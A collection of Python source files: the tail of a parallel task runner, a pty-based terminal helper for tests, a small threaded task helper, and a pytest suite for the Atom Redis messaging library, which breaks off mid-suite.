self._semaphore.release()
proc.terminate()
running_tasks.remove((proc,task))
break # need when a process is found that is done!
time.sleep(.5)
# print currently running processes every once in a while.
if int((time.time() - start_time) / self.print_fitting_time) > print_count and self.verbose >= 1:
print '[Parallel][{:02d}h{:02d}m] running:'.format(*divmod(print_count*10, 60)),
for _, task in running_tasks:
if task == running_tasks[-1][1]: # last task
print '{}'.format(task.name)
else:
print '{},'.format(task.name),
# print '[Parallel] {} ({:d}:{:2d})'.format(task.name, *divmod(int(start_time_task[task.name] - time.time()/60), 60))
print_count += 1
thread_handle_processes = Thread(target=handle_processes, args=(task_queue,))
thread_handle_processes.start()
# Thread - catch results from result_queue and put back in self.task list
def handle_results():
processed_results = 0
while processed_results < len(self.tasks):
task, index = result_queue.get()
if self.verbose >= 3: print '[thread-result] saving result for', task.name, 'to task list'
self.tasks[index] = task
processed_results += 1
time.sleep(.1)
thread_handle_results = Thread(target=handle_results, args=())
thread_handle_results.start()
# block main thread
thread_add_processes.join()
thread_handle_processes.join()
thread_handle_results.join()
assert all((i.done for i in self.tasks))
@property
def result(self):
if not all((i.done for i in self.tasks)):
return None
return [i.result for i in self.tasks]
@property
def task_names(self):
return [i.name for i in self.tasks]
@property
def task_dict(self):
"""Dict: set of names (str) --> set of tasks (prediction.Predictor subclass)"""
return dict((task.name, task) for task in self.tasks)
@property
def result_dict(self):
"""Dict: set of names (str) --> set of results (causallib.CausalArray)"""
return dict((task.name, task.result) for task in self.tasks)
#############################
# Fit from file #
#############################
def fit_from_files(task_file, data_file, verbose=True):
"""Fit a prediction task using previously saved task file and data file"""
print_fitting_time = 1
if verbose: print '[FitFromFile] Called with \n\ttask: {}\n\tdata: {}'.format(task_file, data_file)
assert os.path.exists(task_file)
assert os.path.exists(data_file)
task = Predictor.pickle_load(task_file)
data = MicroArrayData.load(data_file)
start_time = time.time()
if verbose: print '[FitFromFile] Fitting {task.name} on {data.name}..'.format(task=task, data=data)
task.fit(data)
print_count = 1
if int((time.time() - start_time) / print_fitting_time) > print_count and verbose >= 1:
print '[FitFromFile][{:02d}h{:02d}m] running:'.format(*divmod(print_count*10, 60)),
print_count += 1
|
terminal.py
|
import sys
import pyte
import operator
import threading
from contextlib import contextmanager
import time
import os
if sys.platform.startswith("win"):
import winpty
else:
import ptyprocess
__all__ = ["PtyProcess", "Screen", "ByteStream", "Terminal"]
if sys.platform.startswith("win"):
ParentPtyProcess = winpty.PtyProcess
else:
ParentPtyProcess = ptyprocess.PtyProcess
class PtyProcess(ParentPtyProcess):
def read(self, nbytes):
if sys.platform.startswith("win"):
return super(PtyProcess, self).read(nbytes).encode("utf-8")
else:
return super(PtyProcess, self).read(nbytes)
def write(self, data):
if sys.platform.startswith("win"):
super(PtyProcess, self).write(data.decode("utf-8"))
else:
super(PtyProcess, self).write(data)
class Screen(pyte.Screen):
def __init__(self, process, *args, **kwargs):
self._process = process
super(Screen, self).__init__(*args, **kwargs)
def write_process_input(self, data):
self._process.write(data.encode("utf-8"))
class ByteStream(pyte.ByteStream):
def start_feeding(self):
screen = self.listener
process = screen._process
def reader():
while True:
try:
data = process.read(1024)
except EOFError:
break
if data:
self.feed(data)
t = threading.Thread(target=reader)
t.start()
class Var(object):
def __init__(self, getter):
self.getter = getter
def __getattr__(self, name):
# fallback methods
def _(*args, **kwargs):
return Var(lambda: getattr(self.getter(), name)(*args, **kwargs))
return _
def observe(self, *args, **kwargs):
return self.getter(*args, **kwargs)
def _assert(self, op, operand, timeout=5):
t = time.time()
while time.time() - t < timeout:
value = self.getter()
if op(value, operand):
break
time.sleep(0.05)
else:
raise Exception("value is {}".format(value))
def assert_startswith(self, operand, timeout=5):
self._assert(str.startswith, operand, timeout)
def assert_endswith(self, operand, timeout=5):
self._assert(str.endswith, operand, timeout)
def assert_equal(self, operand, timeout=5):
self._assert(operator.eq, operand, timeout)
def assert_contains(self, operand, timeout=5):
self._assert(operator.contains, operand, timeout)
class Terminal(object):
def __init__(self, process, screen, stream):
self.process = process
self.screen = screen
self.stream = stream
@classmethod
@contextmanager
def open(cls, cmd):
# github actions windows-2019 doesn't like (24, 80)
env = os.environ.copy()
env["RETICULATE_PYTHON"] = sys.executable
# don't not prompt to install miniconda
env["RETICULATE_MINICONDA_ENABLED"] = "0"
process = PtyProcess.spawn(cmd, dimensions=(40, 80), env=env)
screen = Screen(process, 80, 40)
stream = ByteStream(screen)
stream.start_feeding()
try:
yield cls(process, screen, stream)
finally:
process.terminate(force=True)
def sendintr(self):
self.process.sendintr()
def isalive(self):
return self.process.isalive()
def write(self, x):
self.process.write(x.encode('utf-8'))
def _line(self, num=0):
# parent's `line` method
return self.screen.display[num]
def line(self, num=0):
return Var(lambda: self._line(num))
def cursor(self):
return Var(lambda: (self.screen.cursor.x, self.screen.cursor.y))
def current_line(self):
return Var(lambda: self._line(self.screen.cursor.y))
def previous_line(self, num=1):
return Var(lambda: self._line(self.screen.cursor.y - num))
|
task.py
|
from .debug import Logger
from threading import Thread
mylog = Logger()
class Task(object):
def __init__(self, function=None):
"""
Base Async Task Object
Base constructor
"""
self.name = "Task"
self.function = function
def delay(self, *args):
background_send = Thread(target=self.async, args=(self.function, *args))
background_send.start()
return print(background_send)
def async(self, task, *args):
try:
if len(args) == 1:
task(args[0])
mylog.debug("Successful")
else:
task(*args)
mylog.debug("Successful")
except:
mylog.debug("Error")
def shared_task(*args):
try:
base_task = Task(args[0])
return base_task
except:
task = Task()
return task
|
test_atom.py
|
import copy
import gc
import os
import random
import time
from multiprocessing import Process, Queue
from threading import Thread
import numpy as np
import pytest
import redis
from atom import AtomError, Element, MetricsLevel, SetEmptyError
from atom.config import (
ATOM_CALLBACK_FAILED,
ATOM_COMMAND_NO_ACK,
ATOM_COMMAND_NO_RESPONSE,
ATOM_COMMAND_UNSUPPORTED,
ATOM_NO_ERROR,
ATOM_USER_ERRORS_BEGIN,
COMMAND_LIST_COMMAND,
DEFAULT_REDIS_PORT,
DEFAULT_REDIS_SOCKET,
HEALTHCHECK_COMMAND,
HEALTHCHECK_RETRY_INTERVAL,
LANG,
REDIS_PIPELINE_POOL_SIZE,
VERSION,
VERSION_COMMAND,
)
from atom.element import ElementConnectionTimeoutError
from atom.messages import Response, StreamHandler
from msgpack import unpackb
from redistimeseries.client import Client as RedisTimeSeries
pytest.caller_incrementor = 0
pytest.responder_incrementor = 0
TEST_REDIS_SOCKET = os.getenv("TEST_REDIS_SOCKET", DEFAULT_REDIS_SOCKET)
TEST_REDIS_HOST = os.getenv("TEST_REDIS_HOST", None)
TEST_REDIS_PORT = os.getenv("TEST_REDIS_PORT", DEFAULT_REDIS_PORT)
class TestAtom:
def _assert_cleaned_up(self, element):
for s in element.streams:
private_sn = element._make_stream_id(element.name, s)
exists_val = element._rclient.exists(private_sn)
assert not exists_val, "private redis stream key %s should not exist" % (
private_sn,
)
def _element_create(
self,
name,
host=TEST_REDIS_HOST,
port=TEST_REDIS_PORT,
socket_path=TEST_REDIS_SOCKET,
conn_timeout_ms=2000,
data_timeout_ms=5000,
):
# Make sure metrics is enabled. Some tests turn it off
os.environ["ATOM_USE_METRICS"] = "TRUE"
return Element(
name,
host=host,
port=port,
socket_path=socket_path,
conn_timeout_ms=conn_timeout_ms,
data_timeout_ms=data_timeout_ms,
)
def _element_start(
self,
element,
caller,
read_block_ms=500,
do_healthcheck=True,
healthcheck_interval=0.5,
):
element.command_loop(block=False, read_block_ms=read_block_ms)
if do_healthcheck:
caller.wait_for_elements_healthy(
[element.name], retry_interval=healthcheck_interval
)
def _element_cleanup(self, element):
element.command_loop_shutdown(block=True)
element._clean_up()
def _get_redis_client(self):
if TEST_REDIS_HOST is not None:
client = redis.StrictRedis(host=TEST_REDIS_HOST, port=TEST_REDIS_PORT)
else:
client = redis.StrictRedis(unix_socket_path=TEST_REDIS_SOCKET)
return client
@pytest.fixture(autouse=True)
def client(self):
"""
Run at setup, creates a redis client and flushes
all existing keys in the DB to ensure no interaction
between the tests and a fresh startup state between the
tests
"""
client = self._get_redis_client()
client.flushall()
keys = client.keys()
assert keys == []
yield client
del client
@pytest.fixture
def caller(self, client, check_redis_end, metrics):
"""
Sets up the caller before each test function is run.
Tears down the caller after each test is run.
"""
# Want to be at the highest log level for testing
os.environ["ATOM_LOG_LEVEL"] = "DEBUG"
caller_name = "test_caller_%s" % (pytest.caller_incrementor,)
caller = self._element_create(caller_name)
yield caller, caller_name
pytest.caller_incrementor += 1
# Need to manually call the delete method to
# clean up the object since garbage collection
# won't get to it until all fixtures have run and
# then the check_redis_end fixture won't be able
# to see how well we cleaned up
caller._clean_up()
@pytest.fixture
def responder(self, client, check_redis_end, metrics):
"""
Sets up the responder before each test function is run.
Tears down the responder after each test is run.
"""
responder_name = "test_responder_%s" % (pytest.responder_incrementor,)
responder = self._element_create(responder_name)
yield responder, responder_name
pytest.responder_incrementor += 1
# Need to manually call the delete method to
# clean up the object since garbage collection
# won't get to it until all fixtures have run and
# then the check_redis_end fixture won't be able
# to see how well we cleaned up
responder._clean_up()
@pytest.fixture(autouse=True)
def check_redis_end(self):
"""
Runs at end -- IMPORTANT: must depend on caller and responder
in order to ensure it runs after the caller and responder
cleanup.
"""
client = self._get_redis_client()
yield client
keys = client.keys()
assert keys == [] or keys == [b"log"]
del client
@pytest.fixture
def metrics(self):
metrics = RedisTimeSeries(unix_socket_path="/shared/metrics.sock")
metrics.redis.flushall()
yield metrics
del metrics
def test_caller_responder_exist(self, caller, responder):
"""
Ensures that the caller and responder were created with the proper
names.
"""
caller, caller_name = caller
responder, responder_name = responder
print(caller.get_all_elements())
assert responder_name in caller.get_all_elements()
assert caller_name in responder.get_all_elements()
def test_id_generation(self, caller):
"""
Ensures id generation functions are working with expected input.
"""
caller, caller_name = caller
assert caller._make_response_id("abc") == "response:abc"
assert caller._make_command_id("abc") == "command:abc"
assert caller._make_stream_id("abc", "123") == "stream:abc:123"
def test_command_in_redis(self, caller, responder):
"""
Tests caller sending command and verifies that command was sent properly
in Redis.
"""
caller, caller_name = caller
responder, responder_name = responder
proc = Process(
target=caller.command_send,
args=(
responder_name,
"test_cmd",
0,
),
)
proc.start()
data = caller._rclient.xread(
{caller._make_command_id(responder_name): "$"}, block=1000
)
proc.join()
stream, msgs = data[0] # since there's only one stream
assert stream.decode() == "command:%s" % (responder_name,)
_id, msg = msgs[0]
assert msg[b"element"].decode() == caller_name
assert msg[b"cmd"] == b"test_cmd"
assert msg[b"data"] == b"0"
def test_add_entry_and_get_n_most_recent(self, caller, responder):
"""
Adds 10 entries to the responder's stream and makes sure that the
proper values are returned from get_n_most_recent.
"""
caller, caller_name = caller
responder, responder_name = responder
for i in range(10):
responder.entry_write("test_stream", {"data": i})
entries = caller.entry_read_n(responder_name, "test_stream", 5)
assert len(entries) == 5
assert entries[0]["data"] == b"9"
assert entries[-1]["data"] == b"5"
def test_add_entry_with_override_element_name(self, caller, responder):
"""
Adds an entry to the responder stream with a fake element name and
makes sure that entry is on correct stream.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.entry_write(
"test_stream", {"data": "fake"}, element_name="fake_element"
)
# assert that entries are on override element stream
entries = caller.entry_read_since("fake_element", "test_stream", last_id=0)
assert len(entries) == 1
assert entries[0]["data"] == b"fake"
# assert that writing element stream is empty
entries = caller.entry_read_since(responder_name, "test_stream", last_id=0)
assert len(entries) == 0
# clean up stream (necessary since it doesn't belong to a real element)
caller._rclient.unlink("stream:fake_element:test_stream")
def test_add_entry_and_get_n_most_recent_legacy_serialize(self, caller, responder):
"""
Adds 10 entries to the responder's stream with legacy serialization
and makes sure that the proper values are returned from
get_n_most_recent.
"""
caller, caller_name = caller
responder, responder_name = responder
for i in range(10):
data = {"data": i}
responder.entry_write("test_stream_serialized", data, serialize=True)
# Ensure that serialization keeps the original data in tact
assert data["data"] == i
entries = caller.entry_read_n(
responder_name, "test_stream_serialized", 5, deserialize=True
)
assert len(entries) == 5
assert entries[0]["data"] == 9
assert entries[-1]["data"] == 5
def test_add_entry_and_get_n_most_recent_arrow_serialized(self, caller, responder):
"""
Adds 10 entries to the responder's stream with Apache Arrow
serialization and makes sure that the proper values are returned
from get_n_most_recent without specifying deserialization
method in method call, instead relying on serialization key embedded
within entry.
"""
caller, caller_name = caller
responder, responder_name = responder
for i in range(10):
data = {"data": i}
responder.entry_write(
"test_stream_arrow_serialized", data, serialization="arrow"
)
# Ensure that serialization keeps the original data in tact
assert data["data"] == i
entries = caller.entry_read_n(responder_name, "test_stream_arrow_serialized", 5)
assert len(entries) == 5
assert entries[0]["data"] == 9
assert entries[-1]["data"] == 5
def test_add_entry_and_get_n_most_recent_arrow_numpy_serialized(
self, caller, responder
):
"""
Adds 10 entries to the responder's stream with Apache Arrow
serialization and makes sure the proper values are returned from
get_n_most_recent without specifying deserialization method in
method call, instead relying on serialization key embedded within
entry.
"""
caller, caller_name = caller
responder, responder_name = responder
for i in range(10):
data = {"data": np.ones((3, 3)) * i}
responder.entry_write(
"test_stream_arrow_numpy_serialized", data, serialization="arrow"
)
entries = caller.entry_read_n(
responder_name, "test_stream_arrow_numpy_serialized", 5
)
assert len(entries) == 5
assert np.array_equal(entries[0]["data"], np.ones((3, 3)) * 9)
assert np.array_equal(entries[-1]["data"], np.ones((3, 3)) * 5)
def test_add_entry_arrow_serialize_custom_type(self, caller, responder):
"""
Attempts to add an arrow-serialized entry of a custom
(not Python built-in) type. Ensures that TypeError is raised.
"""
caller, caller_name = caller
responder, responder_name = responder
class CustomClass:
pass
inst = CustomClass()
with pytest.raises(TypeError) as excinfo:
responder.entry_write(
"test_arrow_custom_type", {"data": inst}, serialization="arrow"
)
print(excinfo.value)
assert "not serializeable by pyarrow without pickling" in str(excinfo.value)
# Test collection containing non-serializeable type
with pytest.raises(TypeError) as excinfo:
responder.entry_write(
"test_arrow_custom_type", {"data": [inst]}, serialization="arrow"
)
print(excinfo.value)
assert "not serializeable by pyarrow without pickling" in str(excinfo.value)
def test_add_command(self, responder):
"""
Ensures that a command can be added to a responder.
"""
responder, responder_name = responder
responder.command_add("test_command", lambda x: x, timeout=123)
assert "test_command" in responder.handler_map
assert responder.timeouts["test_command"] == 123
def test_clean_up_stream(self, responder):
"""
Ensures that a stream can be removed from Redis and removed from
responder's streams set.
"""
responder, responder_name = responder
responder.entry_write("clean_me", {"data": 0})
assert "stream:%s:clean_me" % (responder_name,) in responder.get_all_streams()
responder.clean_up_stream("clean_me")
assert (
"stream:%s:clean_me" % (responder_name,) not in responder.get_all_streams()
)
assert "clean_me" not in responder.streams
self._assert_cleaned_up(responder)
def test_clean_up_stream_element_name(self, caller, responder):
"""
Ensures an element can clean up a stream with a different element
name.
"""
responder, responder_name = responder
responder.entry_write("clean_me", {"data": 0}, element_name="fake")
# have responder element clean up stream with fake element name
responder.clean_up_stream("clean_me", element_name="fake")
stream_exists = responder._rclient.exists("stream:clean_me:fake")
assert not stream_exists
def test_clean_up(self, responder):
"""
Ensures that a responder can be removed from Redis
"""
responder, responder_name = responder
new_responder = self._element_create("new_responder")
assert "new_responder" in responder.get_all_elements()
del new_responder
# Explicitly invoke collection after ref count set to 0
gc.collect()
assert "new_responder" not in responder.get_all_elements()
def test_command_response(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
self._element_start(responder, caller)
response = caller.command_send(responder_name, "add_1", 42)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
def test_log_fail_in_command_loop(self, caller, responder):
caller, caller_name = caller
responder, responder_name = responder
def fail(x):
raise ValueError("oh no")
responder.command_add("fail", fail)
# this should be a non-blocking call
responder.command_loop(n_workers=1, block=False)
caller.command_send(responder_name, "fail", 42)
responder.command_loop_shutdown()
del responder
def test_command_response_n_workers_2_no_fork(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
# this should be a non-blocking call
responder.command_loop(n_workers=2, block=False)
response = caller.command_send(responder_name, "add_1", 42)
response2 = caller.command_send(responder_name, "add_1", 43)
response3 = caller.command_send(responder_name, "add_1", 44)
responder.command_loop_shutdown()
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
assert response2["err_code"] == ATOM_NO_ERROR
assert response2["data"] == b"44"
assert response3["err_code"] == ATOM_NO_ERROR
assert response3["data"] == b"45"
time.sleep(0.5)
del responder
def test_command_response_n_workers_2_threads(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
thread = Thread(target=responder.command_loop, kwargs={"n_workers": 2})
thread.start()
response = caller.command_send(responder_name, "add_1", 42)
response2 = caller.command_send(responder_name, "add_1", 43)
response3 = caller.command_send(responder_name, "add_1", 44)
responder.command_loop_shutdown()
thread.join()
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
assert response2["err_code"] == ATOM_NO_ERROR
assert response2["data"] == b"44"
assert response3["err_code"] == ATOM_NO_ERROR
assert response3["data"] == b"45"
def test_command_response_n_workers_2(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
proc = Process(target=responder.command_loop, kwargs={"n_workers": 2})
proc.start()
response = caller.command_send(responder_name, "add_1", 42)
response2 = caller.command_send(responder_name, "add_1", 43)
response3 = caller.command_send(responder_name, "add_1", 44)
responder.command_loop_shutdown()
proc.join()
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
assert response2["err_code"] == ATOM_NO_ERROR
assert response2["data"] == b"44"
assert response3["err_code"] == ATOM_NO_ERROR
assert response3["data"] == b"45"
def test_command_response_n_workers_2_use_threads(self, caller, responder):
"""
Element sends command and responder returns response if we use threads
for workers instead of processes.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.command_add("add_1", add_1)
proc = Process(
target=responder.command_loop, kwargs={"n_workers": 2, "use_procs": False}
)
proc.start()
response = caller.command_send(responder_name, "add_1", 42)
response2 = caller.command_send(responder_name, "add_1", 43)
response3 = caller.command_send(responder_name, "add_1", 44)
responder.command_loop_shutdown()
proc.join()
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b"43"
assert response2["err_code"] == ATOM_NO_ERROR
assert response2["data"] == b"44"
assert response3["err_code"] == ATOM_NO_ERROR
assert response3["data"] == b"45"
def test_command_response_legacy_serialized(self, caller, responder):
"""
Element sends command and responder returns response.
Tests expected use case of command response.
"""
caller, caller_name = caller
responder, responder_name = responder
def add_1_serialized(data):
return Response(data + 1, serialize=True)
responder.command_add("add_1_3", add_1_serialized, deserialize=True)
self._element_start(responder, caller)
response = caller.command_send(
responder_name, "add_1_3", 0, serialize=True, deserialize=True
)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == 1
def test_command_response_mixed_serialization(self, caller, responder):
"""
Ensures that command and response are serialized correctly based on
serialization specified.
"""
caller, caller_name = caller
responder, responder_name = responder
def add_1_arrow_serialized(data):
return Response(data + 1, serialization="arrow")
responder.command_add(
"test_command", add_1_arrow_serialized, serialization="msgpack"
)
assert "test_command" in responder.handler_map
assert responder.handler_map["test_command"]["serialization"] == "msgpack"
self._element_start(responder, caller)
response = caller.command_send(
responder_name, "test_command", 123, serialization="msgpack"
)
self._element_cleanup(responder)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == 124
def test_listen_on_streams(self, caller, responder):
"""
Creates two responders publishing entries on their respective streams
with a caller listening on those streams and publishing data to a
new stream. This test ensures that the new stream contains all the
data from the responders.
"""
caller, caller_name = caller
responder, responder_name = responder
responder_0_name = responder_name + "_0"
responder_1_name = responder_name + "_1"
responder_0 = self._element_create(responder_0_name)
responder_1 = self._element_create(responder_1_name)
entries = set()
def entry_write_loop(responder, stream_name, data):
# Wait until both responders and the caller are ready
while -1 not in entries or -2 not in entries:
responder.entry_write(
stream_name, {"value": data - 2}, serialization="msgpack"
)
for i in range(10):
responder.entry_write(
stream_name, {"value": data}, serialization="msgpack"
)
data += 2
def add_entries(data):
entries.add(data["value"])
proc_responder_0 = Thread(
target=entry_write_loop,
args=(
responder_0,
"stream_0",
0,
),
)
proc_responder_1 = Thread(
target=entry_write_loop,
args=(
responder_1,
"stream_1",
1,
),
)
stream_handlers = [
StreamHandler(responder_0_name, "stream_0", add_entries),
StreamHandler(responder_1_name, "stream_1", add_entries),
]
thread_caller = Thread(
target=caller.entry_read_loop,
args=(
stream_handlers,
None,
1000,
True,
),
daemon=True,
)
thread_caller.start()
proc_responder_0.start()
proc_responder_1.start()
proc_responder_0.join()
proc_responder_1.join()
# Wait to give the caller time to handle all the data from the streams
thread_caller.join(5.0)
caller._rclient.delete(f"stream:{responder_0_name}:stream_0")
caller._rclient.delete(f"stream:{responder_1_name}:stream_1")
for i in range(20):
assert i in entries
self._element_cleanup(responder_0)
self._element_cleanup(responder_1)
def test_read_since(self, caller, responder):
"""
Sets the current timestamp as last_id and writes 5 entries to a stream.
Ensures that we can get 5 entries since the last id using
entry_read_since.
"""
caller, caller_name = caller
responder, responder_name = responder
responder.entry_write("test_stream", {"data": None})
# Sleep so that last_id is later than the first entry
time.sleep(0.01)
last_id = responder._get_redis_timestamp()
# Sleep so that the entries are later than last_id
time.sleep(0.01)
for i in range(5):
responder.entry_write("test_stream", {"data": i})
# Ensure this doesn't get an entry (because it's waiting for new entries
# nd they never come)
entries = caller.entry_read_since(responder_name, "test_stream")
assert len(entries) == 0
# Ensure this gets all entries
entries = caller.entry_read_since(responder_name, "test_stream", last_id="0")
assert len(entries) == 6
# Ensure we get the correct number of entries since the last_id
entries = caller.entry_read_since(responder_name, "test_stream", last_id)
assert len(entries) == 5
# Ensure that if we pass n, we get the n earliest entries since last_id
entries = caller.entry_read_since(responder_name, "test_stream", last_id, 2)
assert len(entries) == 2
assert entries[-1]["data"] == b"1"
# Ensure that last_id=='$' only gets new entries arriving after the call
q = Queue()
def wrapped_read(q):
q.put(caller.entry_read_since(responder_name, "test_stream", block=500))
proc = Process(target=wrapped_read, args=(q,))
proc.start()
time.sleep(
0.1
) # sleep to give the process time to start listening for new entries
responder.entry_write("test_stream", {"data": None})
entries = q.get()
responder.command_loop_shutdown()
proc.join()
proc.terminate()
assert len(entries) == 1
def test_parallel_read_write(self, caller, responder):
"""
Has the same responder class receiving commands on 1 thread,
while publishing to a stream on a 2nd thread at high volume.
Meanwhile, a caller quickly sends a series of commands to the responder
and verifies we get valid results back.
Ensures that we can safely send and receive using the same element class
without concurrency issues.
"""
caller, caller_name = caller
responder, responder_name = responder
responder_0_name = responder_name + "_0"
responder_0 = self._element_create(responder_0_name)
def no_op_serialized(data):
"""
NO_OP command responds with whatever data it receives
"""
return Response(data, serialization="msgpack")
responder_0.command_add("no_op", no_op_serialized, serialization="msgpack")
# Entry write loop mimics high volume publisher
def entry_write_loop(responder):
for i in range(3000):
responder.entry_write("stream_0", {"value": 0}, serialization="msgpack")
time.sleep(0.0001)
# Command loop thread to handle incoming commands
self._element_start(responder_0, caller)
# Entry write thread to publish a whole bunch to a stream
entry_write_thread = Thread(
target=entry_write_loop, args=(responder_0,), daemon=True
)
entry_write_thread.start()
# Send a bunch of commands to responder and you should get valid
# responses back, even while its busy publishing to a stream
try:
for i in range(20):
response = caller.command_send(
responder_0_name, "no_op", 1, serialization="msgpack"
)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == 1
finally:
# Cleanup threads
entry_write_thread.join()
self._element_cleanup(responder_0)
del responder_0
def test_healthcheck_default(self, caller, responder):
"""
Verify default healthcheck
"""
caller, caller_name = caller
responder, responder_name = responder
self._element_start(responder, caller)
response = caller.command_send(responder_name, HEALTHCHECK_COMMAND)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b""
self._element_cleanup(responder)
def test_healthcheck_success(self, caller, responder):
"""
Verify a successful response from a custom healthcheck
"""
caller, caller_name = caller
responder = self._element_create("healthcheck_success_responder")
responder.healthcheck_set(lambda: Response(err_code=0, err_str="We're good"))
self._element_start(responder, caller)
response = caller.command_send(
"healthcheck_success_responder", HEALTHCHECK_COMMAND
)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == b""
assert response["err_str"] == "We're good"
self._element_cleanup(responder)
def test_healthcheck_failure(self, caller, responder):
"""
Verify a failed response from a custom healthcheck
"""
responder = self._element_create("healthcheck_failure_responder")
caller, caller_name = caller
responder.healthcheck_set(
lambda: Response(err_code=5, err_str="Camera is unplugged")
)
self._element_start(responder, caller, do_healthcheck=False)
response = caller.command_send(
"healthcheck_failure_responder", HEALTHCHECK_COMMAND
)
assert response["err_code"] == 5 + ATOM_USER_ERRORS_BEGIN
assert response["data"] == b""
assert response["err_str"] == "Camera is unplugged"
self._element_cleanup(responder)
def test_wait_for_elements_healthy(self, caller, responder):
"""
Verify wait_for_elements_healthy success/failure cases
"""
caller, caller_name = caller
responder, responder_name = responder
self._element_start(responder, caller)
def wait_for_elements_check(caller, elements_to_check):
caller.wait_for_elements_healthy(elements_to_check)
wait_for_elements_thread = Thread(
target=wait_for_elements_check, args=(caller, [responder_name]), daemon=True
)
wait_for_elements_thread.start()
# If elements reported healthy, call should have returned quickly and
# thread should exit
wait_for_elements_thread.join(0.5)
assert not wait_for_elements_thread.is_alive()
wait_for_elements_thread = Thread(
target=wait_for_elements_check,
args=(caller, [responder_name, "test_responder_2"]),
daemon=True,
)
wait_for_elements_thread.start()
# 1 of these elements is missing, so thread is busy and this join call
# should timeout retrying
wait_for_elements_thread.join(0.5)
assert wait_for_elements_thread.is_alive()
try:
responder_2 = self._element_create("test_responder_2")
self._element_start(responder_2, caller, do_healthcheck=False)
# test_responder_2 is alive now, so both healthchecks should succeed
# and thread should exit roughly within the retry interval
wait_for_elements_thread.join(HEALTHCHECK_RETRY_INTERVAL + 1.0)
assert not wait_for_elements_thread.is_alive()
finally:
# Cleanup threads
self._element_cleanup(responder_2)
del responder_2
self._element_cleanup(responder)
def test_version_command(self, caller, responder):
"""
Verify the response from the get_element_version command
"""
caller, caller_name = caller
responder, responder_name = responder
self._element_start(responder, caller)
response = caller.command_send(
responder_name, VERSION_COMMAND, serialization="msgpack"
)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == {
"version": float(".".join(VERSION.split(".")[:-1])),
"language": LANG,
}
response2 = caller.get_element_version(responder_name)
assert response == response2
self._element_cleanup(responder)
def test_command_list_command(self, caller, responder):
"""
Verify the response from the COMMAND_LIST_COMMAND command
"""
caller, caller_name = caller
responder, responder_name = responder
# Test with no commands
no_command_responder = self._element_create("no_command_responder")
self._element_start(no_command_responder, caller)
assert (
caller.command_send(
no_command_responder.name, COMMAND_LIST_COMMAND, serialization="msgpack"
)["data"]
== []
)
self._element_cleanup(no_command_responder)
del no_command_responder
responder = self._element_create("responder_with_commands")
# Add commands to responder
responder.command_add("foo_func1", lambda data: data)
responder.command_add(
"foo_func2", lambda: None, timeout=500, serialization="msgpack"
)
responder.command_add(
"foo_func3", lambda x, y: x + y, timeout=1, serialization="msgpack"
)
self._element_start(responder, caller)
# Test with three commands
response = caller.command_send(
responder.name, COMMAND_LIST_COMMAND, serialization="msgpack"
)
assert response["err_code"] == ATOM_NO_ERROR
assert response["data"] == ["foo_func1", "foo_func2", "foo_func3"]
self._element_cleanup(responder)
def test_get_all_commands_with_version(self, caller, responder):
"""
Ensure get_all_commands only queries support elements.
"""
caller, caller_name = caller
responder, responder_name = responder
# Change responder reported version
responder.handler_map[VERSION_COMMAND]["handler"] = lambda: Response(
data={"language": "Python", "version": 0.2}, serialization="msgpack"
)
# Create element with normal, supported version
responder2_name = responder_name + "_2"
responder2 = self._element_create(responder2_name)
# Add commands to both responders and start command loop
responder.command_add("foo_func0", lambda data: data)
responder2.command_add(
"foo_func0", lambda: None, timeout=500, serialization="msgpack"
)
responder2.command_add(
"foo_func1", lambda x, y: x + y, timeout=1, serialization="msgpack"
)
self._element_start(responder, caller)
self._element_start(responder2, caller)
# Retrieve commands
commands = caller.get_all_commands(
element_name=[responder_name, responder2_name]
)
# Do not include responder's commands as the version is too low
desired_commands = [
f"{responder2_name}:foo_func0",
f"{responder2_name}:foo_func1",
]
assert commands == desired_commands
self._element_cleanup(responder)
self._element_cleanup(responder2)
del responder2
def test_get_all_commands(self, caller, responder):
"""
Verify the response from the get_all_commands command
"""
caller, caller_name = caller
responder, responder_name = responder
# Test with no available commands
assert caller.get_all_commands() == []
# Set up two responders
test_name_1, test_name_2 = responder_name + "_1", responder_name + "_2"
responder1, responder2 = (
self._element_create(test_name_1),
self._element_create(test_name_2),
)
proc1_function_data = [
("foo_func0", lambda x: x + 3),
("foo_func1", lambda: None, 10, "arrow"),
("foo_func2", lambda x: None),
]
proc2_function_data = [
("foo_func0", lambda y: y * 3, 10),
("other_foo0", lambda y: None, 3, "msgpack"),
("other_foo1", lambda: 5),
]
# Add functions
for data in proc1_function_data:
responder1.command_add(*data)
for data in proc2_function_data:
responder2.command_add(*data)
self._element_start(responder1, caller)
self._element_start(responder2, caller)
# True function names
responder1_function_names = [f"{test_name_1}:foo_func{i}" for i in range(3)]
responder2_function_names = [
f"{test_name_2}:foo_func0",
f"{test_name_2}:other_foo0",
f"{test_name_2}:other_foo1",
]
# Either order of function names is fine for testing all function names
command_list = caller.get_all_commands()
assert (
command_list == responder1_function_names + responder2_function_names
or command_list == responder2_function_names + responder1_function_names
)
# Test just functions for 1
command_list = caller.get_all_commands(test_name_1)
assert command_list == responder1_function_names
# Test just functions for 2
command_list = caller.get_all_commands(test_name_2)
assert command_list == responder2_function_names
self._element_cleanup(responder1)
